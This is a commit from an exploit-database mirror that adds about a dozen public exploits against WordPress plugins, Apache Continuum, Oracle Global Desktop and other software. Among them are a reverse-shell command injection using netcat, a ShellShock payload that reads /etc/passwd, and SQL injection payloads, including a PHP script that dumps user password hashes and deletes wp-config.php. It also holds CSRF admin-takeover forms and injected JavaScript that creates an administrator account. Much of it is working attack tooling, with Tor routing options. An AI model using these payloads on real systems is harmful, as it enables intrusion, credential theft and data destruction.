bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-06-07

Browse source 
16 new exploits

Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)
Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)

Linux Kernel  2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)
Linux Kernel 2.4.4 <= 2.4.37.4 / 2.6.0 <= 2.6.30.4 - Sendpage Local Privilege Escalation (Metasploit)

Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings
Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root

WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities
Dream Gallery 1.0 - CSRF Add Admin Exploit
Apache Continuum 1.4.2 - Multiple Vulnerabilities
Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit
Valve Steam 3.42.16.13 - Local Privilege Escalation
ArticleSetup 1.00 - CSRF Change Admin Password
Electroweb Online Examination System 1.0 - SQL Injection
WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload
WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS
WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection
WordPress Newspaper Theme 6.7.1 - Privilege Escalation
WordPress Uncode Theme 1.3.1 - Arbitrary File Upload
WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection
Notilus Travel Solution Software 2012 R3 - SQL Injection
rConfig 3.1.1 - Local File Inclusion
Nagios XI 5.2.7 - Multiple Vulnerabilities
This commit is contained in:
Offensive Security 2016-06-07 05:07:41 +00:00
parent 2808c59ead
commit 62962d90b0
18 changed files with 1402 additions and 3 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

20
files.csv
View file

@ -13819,7 +13819,7 @@ id,file,description,date,author,platform,type,port
15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow Exploit (SEH)",2011-01-08,fdiskyou,windows,local,0
15942,platforms/php/webapps/15942.txt,"sahana agasti <= 0.6.5 - Multiple Vulnerabilities",2011-01-08,dun,php,webapps,0
15943,platforms/php/webapps/15943.txt,"WordPress Plugin mingle forum <= 1.0.26 - Multiple Vulnerabilities",2011-01-08,"Charles Hooper",php,webapps,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86 & x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 11.10 x86/x64) - CAP_SYS_ADMIN Local Privilege Escalation Exploit (2)",2011-01-08,"Joe Sylve",linux,local,0
15945,platforms/php/webapps/15945.txt,"Zwii 2.1.1 - Remote File Inclusion Vulnerbility",2011-01-08,"Abdi Mohamed",php,webapps,0
16123,platforms/hardware/remote/16123.txt,"Comcast DOCSIS 3.0 Business Gateways - Multiple Vulnerabilities",2011-02-06,"Trustwave's SpiderLabs",hardware,remote,0
15946,platforms/windows/dos/15946.py,"IrfanView 4.28 - Multiple Denial of Service Vulnerabilities",2011-01-09,BraniX,windows,dos,0
@ -35511,7 +35511,7 @@ id,file,description,date,author,platform,type,port
39273,platforms/php/webapps/39273.txt,"CMSimple /2author/index.php color Parameter Remote Code Execution",2014-07-28,"Govind Singh",php,webapps,0
39274,platforms/windows/dos/39274.py,"CesarFTP 0.99g - XCWD Denial of Service",2016-01-19,"Irving Aguilar",windows,dos,21
39275,platforms/windows/dos/39275.txt,"PDF-XChange Viewer 2.5.315.0 - Shading Type 7 Heap Memory Corruption",2016-01-19,"Sébastien Morin",windows,dos,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings",2016-01-19,"Perception Point Team",linux,local,0
39277,platforms/linux/local/39277.c,"Linux Kernel <= 4.4.1 - REFCOUNT Overflow/Use-After-Free in Keyrings Local Root",2016-01-19,"Perception Point Team",linux,local,0
39278,platforms/hardware/remote/39278.txt,"Barracuda Web Application Firewall Authentication Bypass Vulnerability",2014-08-04,"Nick Hayes",hardware,remote,0
39279,platforms/php/webapps/39279.txt,"WordPress wpSS Plugin 'ss_handler.php' SQL Injection Vulnerability",2014-08-06,"Ashiyane Digital Security Team",php,webapps,0
39280,platforms/php/webapps/39280.txt,"WordPress HDW Player Plugin 'wp-admin/admin.php' SQL Injection Vulnerability",2014-05-28,"Anant Shrivastava",php,webapps,0
@ -35998,6 +35998,7 @@ id,file,description,date,author,platform,type,port
39805,platforms/windows/remote/39805.txt,"Microsoft Windows Media Center - .MCL File Processing Remote Code Execution (MS16-059)",2016-05-12,"Eduardo Braun Prado",windows,remote,0
39808,platforms/windows/webapps/39808.txt,"TrendMicro - Multiple HTTP Problems with CoreServiceShell.exe",2016-05-12,"Google Security Research",windows,webapps,37848
39809,platforms/windows/local/39809.cs,"Microsoft Windows 7-10 & Server 2008-2012 - Local Privilege Escalation (x32/x64) (MS16-032) (C#)",2016-04-25,fdiskyou,windows,local,0
39883,platforms/php/webapps/39883.txt,"WordPress Simple Backup Plugin 2.7.11 - Multiple Vulnerabilities",2016-06-06,PizzaHatHacker,php,webapps,80
39810,platforms/linux/local/39810.py,"NRSS Reader 0.3.9 - Local Stack-Based Overflow",2016-05-13,"Juan Sacco",linux,local,0
39811,platforms/linux/local/39811.txt,"runAV mod_security - Arbitrary Command Execution",2016-05-13,R-73eN,linux,local,0
39812,platforms/multiple/dos/39812.txt,"Wireshark - AirPDcapDecryptWPABroadcastKey Heap-Based Out-of-Bounds Read",2016-05-13,"Google Security Research",multiple,dos,0
@ -36063,3 +36064,18 @@ id,file,description,date,author,platform,type,port
39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Stored XSS",2016-06-02,"Fernando Câmara",jsp,webapps,0
39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706_ 1.5.1_ 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80
39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0
39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - CSRF Add Admin Exploit",2016-06-06,"Ali Ghanbari",php,webapps,80
39886,platforms/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",java,webapps,0
39887,platforms/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - ShellShock Exploit",2016-06-06,lastc0de,cgi,webapps,80
39888,platforms/windows/local/39888.txt,"Valve Steam 3.42.16.13 - Local Privilege Escalation",2016-06-06,gsX,windows,local,0
39889,platforms/php/webapps/39889.html,"ArticleSetup 1.00 - CSRF Change Admin Password",2016-06-06,"Ali Ghanbari",php,webapps,80
39890,platforms/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",php,webapps,80
39891,platforms/php/webapps/39891.txt,"WordPress WP Mobile Detector Plugin 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",php,webapps,80
39892,platforms/php/webapps/39892.php,"WordPress Creative Multi-Purpose Theme 9.1.3 - Stored XSS",2016-06-06,wp0Day.com,php,webapps,80
39893,platforms/php/webapps/39893.php,"WordPress WP PRO Advertising System Plugin 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,php,webapps,80
39894,platforms/php/webapps/39894.php,"WordPress Newspaper Theme 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,php,webapps,80
39895,platforms/php/webapps/39895.php,"WordPress Uncode Theme 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,php,webapps,80
39896,platforms/php/webapps/39896.txt,"WordPress Double Opt-In for Download Plugin 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",php,webapps,80
39897,platforms/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",asp,webapps,80
39898,platforms/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",php,webapps,80
39899,platforms/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,php,webapps,80

Can't render this file because it is too large.

64
platforms/asp/webapps/39897.txt Executable file
View file

@ -0,0 +1,64 @@
Exploit Title: Notilus SQL injection
Product: Notilus travel solution software
Vulnerable Versions: 2012 R3
Tested Version: 2012 R3
Advisory Publication: 03/06/2016
Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [CWE-89]
CVE Reference: NONE
Credit: Alex Haynes
Advisory Details:
(1) Vendor & Product Description
--------------------------------
Vendor: DIMO Software
Product & Version:
Notilus travel solution software v2012 R3
Vendor URL & Download:
http://www.notilus.com/
Product Description:
"DIMO Software is the European leader on the Travel and Expense Management market. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc."
(2) Vulnerability Details:
--------------------------
The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields.
Proof of concept:
POST TO /company/profilv4/Password.aspx
Vulnerable parameter: H_OLD
Payload:
ACTION=1&H_OLD=mypass'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\testdomain.mydo'%2b'main.com\vps'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&H_NEW1=%27+or+%27%27%3D%27&H_NEW2=%27+or+%27%27%3D%27
(3) Advisory Timeline:
----------------------
15/02/16 - First Contact: vendor requests details of vulnerability
03/03/16 - Follow up to vendor to inquire about availability of a fix.
03/03/16 - vendor responds that fix will be available 16/03/16.
16/03/16 - Vendor releases patch.
(4)Solution:
------------
Patch to latest available 2012 R3 branch or upgrade to version 2016.
(5) Credits:
------------
Discovered by Alex Haynes

17
platforms/cgi/webapps/39887.txt Executable file
View file

@ -0,0 +1,17 @@
# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop
# Google Dork: intitle:Install the Sun Secure Global Desktop Native Client
# Date: 6/4/2016
# Exploit Author: lastc0de@outlook.com
# Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/
# Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html
# Version: 4.61.915
# Tested on: Linux
VULNERABLE FILE
http://target.com//tarantella/cgi-bin/modules.cgi
POC :
localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt
localhost@~#cat xixixi.txt
which will print out the content of /etc/passwd file.

48
platforms/java/webapps/39886.txt Executable file
View file

@ -0,0 +1,48 @@
# Exploit Title: Unauthenticated command injection - Apache Continuum
# Google Dork: inurl::8080/continuum/
# Date: 04/06/2016
# Exploit Author: David Shanahan (@cyberpunksec)
# Contact: http://www.procheckup.com/
# Vendor Homepage: https://continuum.apache.org/
# Software Link: https://continuum.apache.org/download.cgi
# Version: 1.4.2
# Tested on: Debian
--- Description ---
Apache Continuum is a continuous integration server for building Java projects https://continuum.apache.org/
ProCheckUp has discovered that Apache Continuum is vulnerable to an unauthenticated command injection attack and reflected XSS.
1) Command injection
Vulnerable URL - http://127.0.0.1:8080/continuum/saveInstallation.action
Vulnerable Parameter - installation.varValue
#!/bin/sh
if [ $# -eq 0 ]
then
echo "$0 <rhost> <rport> <lhost> <lport>"
echo "Remember to set up your netcat listener"
exit 1
fi
cmd="\`nc $3 $4 -e /bin/sh\`"
echo "\n\t[ Apache Continuum <= v1.4.2 CMD Injection ]"
echo "\t\t[ Procheckup - David Shanahan ]\n"
curl http://$1:$2/continuum/saveInstallation.action --data "installation.name=blah&installation.type=jdk&installation.varValue=$cmd"
2) Reflected XSS
The cross site scripting attack works against authenticated users only. An example attack would be to send an authenticated user (let's say the admin) the malicious URL.
If the victim is logged in and accesses the URL, the attacker could steal the victim's session cookie and impersonate them.
Vulnerable URL - http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest<script>alert(document.cookie)</script>&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel<http://127.0.0.1:8080/continuum/security/useredit_confirmAdminPassword.action?userAdminPassword=&username=guest&user.username=guest%3cscript%3ealert(document.cookie)%3c/script%3e&user.fullName=Guest&user.email=blah@procheckup.com&user.password=password&user.confirmPassword=password&user.timestampAccountCreation=&user.timestampLastLogin=&user.timestampLastPasswordChange=&user.locked=false&user.passwordChangeRequired=false&method:confirmAdminPassword=Submit&cancel=Cancel>
Fix:
The Apache Continuum project is no longer maintained. Removal of the software is recommended.
http://www.procheckup.com/

2
platforms/linux/local/39277.c
View file

@ -1,7 +1,9 @@
/*
# Exploit Title: Linux kernel REFCOUNT overflow/Use-After-Free in keyrings
# Date: 19/1/2016
# Exploit Author: Perception Point Team
# CVE : CVE-2016-0728
*/
/* CVE-2016-0728 local root exploit
modified by Federico Bento to read kernel symbols from /proc/kallsyms

90
platforms/php/webapps/39883.txt Executable file
View file

@ -0,0 +1,90 @@
####################
# Meta information #
####################
# Exploit Title: Wordpress plugin simple-backup - Multiple vulnerabilities
# Date: 2016-06-02
# Exploit Author: PizzaHatHacker [A] gmail [.] com
# Vendor Homepage: [DEAD LINK] https://wordpress.org/plugins/simple-backup/
# Software Link: [DEAD LINK] https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.11
# Tested on: simple-backup 2.7.11 & Wordpress 4.4.2
#
# History :
# 2016-02-21 Contact requested on the vendor website via "Contact Us"
# 2016-02-24 Contact requested on the vendor website via "Support"
# 2016-03-09 Email to plugins@wordpress.org
# 2016-03-10 Acknowledged by Wordpress team
# 2016-06-02 No information, no response, vulnerabilities not fixed,
# disclosure of this document.
#
##################################
### 1. Arbitrary File Deletion ###
##################################
It is possible to remotely delete arbitrary files on the webserver on wordpress
blogs that have simple-backup plugin installed and enabled. No authentication
is required, the default configuration of simple-backup is affected.
Example 1 : Delete "pizza.txt" in wordpress root :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=../pizza.txt
Example 2 : Delete .htaccess file protecting the backup folder :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&delete_backup_file=.htaccess&download_backup_file=inexisting
Note : When 'download_backup_file' parameter is provided with an invalid
filepath, the PHP script exits prematurely with message "Access Denied!" and so
does not regenerate automaticaly the .htaccess file.
After this request, it may be possible (depending on the web server
configuration) to browse the backup directory and download server backup files
at this URL :
http://127.0.0.1/<WP-path>/simple-backup/
The backup archive files may contain all the wordpress files : configuration
files (wp-config.php etc.), PHP source code (plugins, etc.), and a database
dump (all tables content, wordpress users passwords etc.).
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CVSS Base Score : 7.5
Impact Subscore : 6.4
Exploitability Subscore : 10
########################
### 2. File Download ###
########################
It is possible to download remote files from the webserver on wordpress blogs
that have simple-backup plugin installed and enabled. No authentication is
required, the default configuration of simple-backup is affected.
Example 1 : Download tools.php source file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=
Example 2 : Download a backup file :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=backup-2016-02-21-111047.tar
(If backups are performed automatically at predefined times, it is easy to
find the backup file name, as it is based on the current time).
Moreover, the checks performed on user-provided 'filename' parameter are
insufficient :
simple-backup-manager.php:function download_local_backup_file($filename){
$filename = ltrim($filename, ".\/");
* Only logged-in AND authorized users (with permissions to manage backups)
should be allowed to download files
* The file name should match a backup file and must not be empty
* The input is not correctly checked for directory traversal (use PHP
'basename' instead of 'ltrim')
For example in the special case where a folder 'oldBackups' is created inside
the backup directory, it would be possible to download ANY file on the web
server via direct requests to this kind of URLs :
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../wp-config.php
http://127.0.0.1/<WP-path>/wp-admin/tools.php?page=backup_manager&download_backup_file=oldBackups/../../../../../../etc/passwd
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CVSS Base Score : 5
Impact Subscore : 2.9
Exploitability Subscore : 10

29
platforms/php/webapps/39884.html Executable file
View file

@ -0,0 +1,29 @@
<!--
# Exploit Title: Dream Gallery - CSRF Add Admin Exploit
# Google Dork: "Design by Rafael Clares"
# Date: 2016/06/03
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://phpstaff.com.br/
# Version: 1.0
#Exploit:
-->
<html>
<body>
<form method="post" action="http://localhost/{PACH}/admin/usuario.php?action=incluir">
<input type="hidden" name="user_login" value="ali">
<input type="hidden" name="user_password" type="hidden" value="123456" >
<input type="hidden" name="user_email" value="">
<input type="submit" value="create">
</form>
</body>
</html>
<!--
#########################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->

37
platforms/php/webapps/39889.html Executable file
View file

@ -0,0 +1,37 @@
<!--
# Exploit Title : ArticleSetup 1.00 - CSRF Change Admin Password
# Google Dork : inurl:/article.php?id= intext:Powered By Article Marketing
# Date: 2016/06/04
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://articlesetup.com/
# Software Link: http://www.ArticleSetup.com/downloads/ArticleSetup-Latest.zip
# Version: 1.00
#Desc:
When admin click on malicious link , attacker can login as a new
Administrator
with the credentials detailed below.
#Exploit:
-->
<html>
<body>
<form method="post" action="
http://localhost/{PACH}/admin/adminsettings.php">
<input type="hidden" name="update" value="1">
<input type="hidden" name="pass1" type="hidden" value="12345678" >
<input type="hidden" name="pass2" type="hidden" value="12345678" >
<input type="submit" value="create">
</form>
</body>
</html>
<!--
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007
-->

22
platforms/php/webapps/39890.txt Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: Online examination system 1.0 - SQL Injection
# Google Dork: inurl:showtest.php?subid=
# Date: 2016/06/05
# Exploit Author: Ali Ghanbari
# Vendor Homepage: http://www.onlinefreeprojectdownload.com
# Sofware Link :
http://www.onlinefreeprojectdownload.com/download.php?name=projects/php%20projects/Online_exam.zip
# Version: 1.0
#Exploit:
http://localhost/{PATH}/showtest.php?subid=[SQL Injection]
#Admin Panel:
http://localhost/{PATH}/admin
####################################
[+]Exploit by: Ali Ghanbari
[+]My Telegram :@Exploiter007

34
platforms/php/webapps/39891.txt Executable file
View file

@ -0,0 +1,34 @@
#Exploit Title: WP Mobile Detector <=3.5 Arbitrary File upload
#Google Dork: inurl: /wp-includes/plugins/wp-mobile-detector
#Date: 1-06-2015
#Exploit Author: Aaditya Purani
#Author Details: https://aadityapurani.com
#Vendor: https://wordpress.org/plugins/wp-mobile-detector/changelog
#Version: 3.5
#Tested on: Kali Linux 2.0 Sana / Windows 10
This Vulnerable has been disclosed to public yesterday about WP Mobile
Detector Arbitrary File upload for version <=3.5 in which attacker can
upload malicious PHP Files (Shell) into the Website. Over 10,000 users are
affected, Vendor has released a Patch in their version 3.6 & 3.7 at
https://wordpress.org/plugins/wp-mobile-detector/changelog/ .
I have wrote a Complete POC post:
https://aadityapurani.com/2016/06/03/mobile-detector-poc/
I have made a POC Video Here:
https://www.youtube.com/watch?v=ULE1AVWfHTU
Simple POC:
Go to:
[wordpress sitempath].com/wp-content/plugins/wp-mobile-detector/resize.php?src=[link to your shell.php]
and it will get saved in directory:
/wp-content/plugins/wp-mobile-detector/cache/shell.php

198
platforms/php/webapps/39892.php Executable file
View file

@ -0,0 +1,198 @@
<?php
/**
* Exploit Titie: Bridge - Creative Multi-Purpose WordPress Theme Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://bridge.qodeinteractive.com/
* Software Link: http://themeforest.net/item/bridge-creative-multipurpose-wordpress-theme/7315054
* Version: 9.1.3
* Tested on: Debian 8, PHP 5.6.17-3
* Type: Stored XSS, Ability to overwrite any theme settings.
* Time line: Found [23-Apr-2016], Vendor notified [23-Apr-2016], Vendor fixed: [Yes], [RD:1]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:u:p:f:c:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
switch ($options['m']){
case 'm' :
//Maintanence mode
echo "Putting site in maintenece mode\n";
$data = array('action' => 'qodef_save_options', 'qode_maintenance_mode'=>'yes');
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
case 'x' :
//XSS Mode, create extra admin
echo "Injecting inject.js \n";
$data = array('action' => 'qodef_save_options', 'custom_js'=>file_get_contents(dirname(__FILE__)."/inject.js"));
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $data);
$resp = $curl->getResponse();
echo "Response: ".$resp."\n";
break;
}
}
logIn();
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if ( !isset($options['u']) ){
return false;
}
if ( !isset($options['p']) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('m','x') ) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
Bridge Theme Exploit, Stored XSS, Create Admin account.
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USERNAME] -p [PASSWORD] -m [MODE]
*** You need to have a valid login (customer or subscriber will do) in order to use this "exploit" **
[TARGET_URL] http://localhost/wordpress/
[MODE] x - Permanent XSS DEMO, m - Maintenance Mode
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m x
php $argv[0] -t http://localhost/wordpress --tor=yes -u customer1 -p password -m m
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}
?>
inject.js
});
//Get Token
var domain = location.protocol+'//'+document.domain;
var url = domain+'/wp-admin/user-new.php';
var JQ = jQuery.noConflict();
JQ.ajax({
"url": url,
"success" : function(x){
//Got the response
console.log('Got response');
var re = /name="_wpnonce_create-user"(\s+)value="([^"]+)"/g;
var m = re.exec(x);
if (m[2].match(/([a-z0-9]{10})/)) {
var nonce = m[2];
console.log('Got nonce '+nonce);
}
console.log('Registering, User: wp0day_poc, Pass: secret, Role: Admin ');
JQ.ajax({
"url": url,
"method" : "POST",
"data" :
{ "action":"createuser",
"_wpnonce_create-user": nonce,
"_wp_http_referer" : "/wp-admin/user-new.php",
"user_login": "wp0day_poc",
"email" : "contact@wp0day.com",
"first_name" : "Exploit",
"last_name" : "Poc",
"url" : "http://wp0day.com/",
"pass1" : "secret",
"pass1-text" : "secret",
"pass2" : "secret",
"send_user_notification" : 0,
"role":"administrator",
"createuser" : "Add+New+User"
},
"success" : function(x){
console.log("Register done");
}
});
}
});
$j(document).ready(function(){

177
platforms/php/webapps/39893.php Executable file
View file

@ -0,0 +1,177 @@
<?php
/**
* Exploit Titie: WP PRO Advertising System - All In One Ad Manager Exploit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://wordpress-advertising.com/
* Software Link: http://codecanyon.net/item/wp-pro-advertising-system-all-in-one-ad-manager/269693
* Version: 4.6.18
* Tested on: Debian 8, PHP 5.6.17-3
* Type: SQLi, Unserialize, File Delete.
* Time line: Found [06-May-2016], Vendor notified [06-May-2016], Vendor fixed: [???], [RD:1464914936]
*/
require_once('curl.php');
//OR
//include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php');
$curl = new CurlWrapper();
$options = getopt("t:m:f:c:u:p:s:",array('tor:'));
print_r($options);
$options = validateInput($options);
if (!$options){
showHelp();
}
if ($options['tor'] === true)
{
echo " ### USING TOR ###\n";
echo "Setting TOR Proxy...\n";
$curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/");
$curl->addOption(CURLOPT_PROXYTYPE,7);
echo "Checking IPv4 Address\n";
$curl->get('https://dynamicdns.park-your-domain.com/getip');
echo "Got IP : ".$curl->getResponse()."\n";
echo "Are you sure you want to do this?\nType 'wololo' to continue: ";
$answer = fgets(fopen ("php://stdin","r"));
if(trim($answer) != 'wololo'){
die("Aborting!\n");
}
echo "OK...\n";
}
class CPDF_Adapter{
private $_image_cache;
public function set_file($file){
$this->_image_cache = array($file);
}
}
function logIn(){
global $curl, $options;
file_put_contents('cookies.txt',"\n");
$curl->setCookieFile('cookies.txt');
$curl->get($options['t']);
$data = array('log'=>$options['u'], 'pwd'=>$options['p'], 'redirect_to'=>$options['t'], 'wp-submit'=>'Log In');
$curl->post($options['t'].'/wp-login.php', $data);
$status = $curl->getTransferInfo('http_code');
if ($status !== 302){
echo "Login probably failed, aborting...\n";
echo "Login response saved to login.html.\n";
die();
}
file_put_contents('login.html',$curl->getResponse());
}
function exploit(){
global $curl, $options;
if ($options['m'] == 'd'){
echo "Delete mode\n";
$pay_load_obj = new CPDF_Adapter();
$pay_load_obj->set_file('../../../../../../wp-config.php', '../../../../../../wp-config.php' );
$pay_load = base64_encode(serialize(array($pay_load_obj)));
$data = array('stats_pdf'=>'1', 'data'=>$pay_load);
$curl->post($options['t'].'?'.http_build_query($data));
$resp = $curl->getResponse();
echo $resp;
} else {
echo "SQLi mode \n";
echo "Trying a longin...\n";
logIn();
echo "Running SQL in Inject mode: ".$options['s']."\n";
$pay_load = array('action'=>'load_stats', 'group'=>'1=1 UNION ALL SELECT ('.$options['s'].') LIMIT 1,1# ', 'group_id'=>'1', 'rid'=>1);
$curl->post($options['t'].'/wp-admin/admin-ajax.php', $pay_load);
$resp = $curl->getResponse();
//Grab the output
if (preg_match('~<div class="am_data">(.*?)(?:</div)~', $resp, $mat)){
if (isset($mat[1])){
echo "Response:\n".$mat[1]."\n";
die("Done\n");
}
}
echo "Failed getting SQLi response, response saved to resp.html\n";
file_put_contents('resp.html', $resp);
}
}
exploit();
function validateInput($options){
if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){
return false;
}
if (!preg_match('~/$~',$options['t'])){
$options['t'] = $options['t'].'/';
}
if (!isset($options['m']) || !in_array($options['m'], array('d','s') ) ){
return false;
}
if ($options['m'] == 's' && (!isset($options['u']) || !isset($options['p']) || !isset($options['s'])) ){
return false;
}
$options['tor'] = isset($options['tor']);
return $options;
}
function showHelp(){
global $argv;
$help = <<<EOD
WP PRO Advertising System - All In One Ad Manager Expoit Pack
Usage: php $argv[0] -t [TARGET URL] --tor [USE TOR?] -u [USER] -p [password] -m [MODE] -s [SQL]
*** In order to use the SQLi part you need an advertiser login **
[TARGET_URL] http://localhost/wordpress/
[MODE] d - Delete wp-config.php
s - SQL Injection
[TOR] Use tor network? (Connects to 127.0.0.1:9150)
Note: In SQLi mode, you can't use ' or ", and you are in a subselect.
To get all users and passwords you would do :
SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 1,1
SELECT concat(user_login,0x3a,user_pass) FROM wp_users LIMIT 2,1
Examples:
php $argv[0] -t http://localhost/wordpress --tor=yes -u user -p password -m d // Try to delete some files
php $argv[0] -t http://localhost/wordpress -u user -p password -m s -s 'SELECT concat(user_login,0x3a,user_pass,0x3a,user_email) FROM wp_users LIMIT 1'
Misc:
CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru>
@link http://github.com/svyatov/CurlWrapper
@license http://www.opensource.org/licenses/mit-license.html MIT License
EOD;
echo $help."\n\n";
die();
}

125
platforms/php/webapps/39894.php Executable file
View file

@ -0,0 +1,125 @@
<?php
/**
* Exploit Title: Newspaper WP Theme Expoit
* Google Dork:
* Exploit Author: wp0Day.com <contact@wp0day.com>
* Vendor Homepage: http://tagdiv.com/newspaper/
